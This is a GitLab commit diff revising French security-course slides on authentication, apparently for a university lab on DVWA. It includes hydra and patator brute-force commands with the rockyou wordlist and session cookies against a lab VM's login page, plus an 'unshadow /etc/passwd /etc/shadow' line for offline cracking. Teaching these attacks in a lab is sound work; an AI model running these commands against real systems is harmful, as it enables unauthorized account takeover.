Skip to content
Snippets Groups Projects
Commit b5133459 authored by Vincent Mazenod's avatar Vincent Mazenod
Browse files

update authentication

parent e7a3ba5b
No related branches found
No related tags found
No related merge requests found
Pipeline #10865 passed
......@@ -12,14 +12,10 @@
## preuves
* ce que je sais
* mot de passe, numéro d'identification personnel
* ce que je possède
* carte d'identité, carte à puce, certificat électronique, Token, Token OTP, périphérique
* ce que je suis
* photo, caractéristique physique, voire biométrie
* ce que je sais faire
* geste, signature
* **ce que je sais**: mot de passe, numéro d'identification personnel
* **ce que je possède**: carte d'identité, carte à puce, certificat électronique, Token, Token OTP, périphérique
* **ce que je suis**: photo, caractéristique physique, voire biométrie
* **ce que je sais faire**: geste, signature
## 2AF
......@@ -283,7 +279,7 @@ Note:
* [CAS](http://www.apereo.org/cas)
*"Identity providers (IdPs) supply user information, while service providers (SPs) consume this information and give access to secure content"*
##### "Identity providers (IdPs) supply user information, while service providers (SPs) consume this information and give access to secure content"
* [SAML](https://fr.wikipedia.org/wiki/SAML) [Shibboleth](images/authentication/Shibboleth.png)
* [OpenID](https://openid.net/)
......@@ -316,30 +312,45 @@ Note:
* [John the Ripper](http://www.openwall.com/john/) permet de générer des mots de passes dérivant de parties du username
## Brute force [Low]
## Brute force [low/medium]
```shell
export security=low
export PHPSESSID=esiff3kfto23f7uit3vr90jks4
```
```shell
hydra -l admin \
-P /usr/share/wordlists/rockyou.txt \
vm-etu-vimazeno.local.isima.fr \
http-form-get "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\: PHPSESSID=i2co2g99ve46qg39rf1bliic7h; security=low;:Username and/or password incorrect."
-P /usr/share/wordlists/rockyou.txt \
vm-etu-vimazeno.local.isima.fr \
http-form-get "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\: PHPSESSID=${PHPSESSID}; security=${security};:Username and/or password incorrect."
```
* [THC Hydra](http://www.thc.org/thc-hydra/)
* [THC Hydra](https://github.com/vanhauser-thc/thc-hydra)
* medium: sleep(2). Un peu plus long.
## Brute force [Low]
## Brute force [medium]
```shell
patator http_fuzz method=GET follow=0 accept_cookie=0 --threads=1 timeout=10 \
export security=medium
export PHPSESSID=esiff3kfto23f7uit3vr90jks4
```
```shell
patator http_fuzz method=GET follow=0 accept_cookie=0 --threads=1 --rate-limit=2 timeout=10 \
url="http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/brute/?username=admin&password=FILE0&Login=Login" \
0=/usr/share/wordlists/rockyou.txt \
header="Cookie: security=low; PHPSESSID=i2co2g99ve46qg39rf1bliic7h" \
resolve="vm-etu-vimazeno.local.isima.fr:10.16.41.197" \ #buggy version https://bytemeta.vip/repo/lanjelot/patator/issues/174
header="Cookie: security=${security}; PHPSESSID=${PHPSESSID}" \
resolve="vm-etu-vimazeno.local.isima.fr:10.16.41.197" \
-x ignore:fgrep='Username and/or password incorrect.'
```
* [patator](https://github.com/lanjelot/patator)
* resolv= -> buggy version https://bytemeta.vip/repo/lanjelot/patator/issues/174
## Brute force [hard]
## attaques offline
......@@ -404,5 +415,5 @@ unshadow /etc/passwd /etc/shadow > mypasswd
* [<i class="fa fa-desktop"></i> Se protéger avec de bons mots de passe](http://doc.m4z3.me/_/bpu/se_proteger_avec_de_bons_mots_de_passe.htm#/cover)
* [<i class="fa fa-video-camera"></i> Se protéger avec de bons mots de passe](http://webtv.u-clermont1.fr/media-MEDIA150410174414391)
* mettre en place en deuxième facteur d'authentification
* mettre en place un deuxième facteur d'authentification
* utiliser la crypto asymétrique
......@@ -4,6 +4,10 @@ default language in kali : https://www.youtube.com/watch?v=zCzxXc2SJ6Y
firefox / burp suite / kali / https://www.youtube.com/watch?v=Uzy28osev5g
simple api project / https://developer.okta.com/blog/2019/03/08/simple-rest-api-php
https://addons.mozilla.org/fr/firefox/addon/proxy-switcher-and-manager/
https://github.com/onhexgroup/Vulnerable-WordPress
https://sharpforce.gitbook.io/cybersecurity/walkthroughs/damn-vulnerable-web-application/damn-vulnerable-web-application-dvwa
https://medium.com/@dannybeton/dvwa-brute-force-tutorial-low-security-463880d53e50
\ No newline at end of file
0% Loading or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment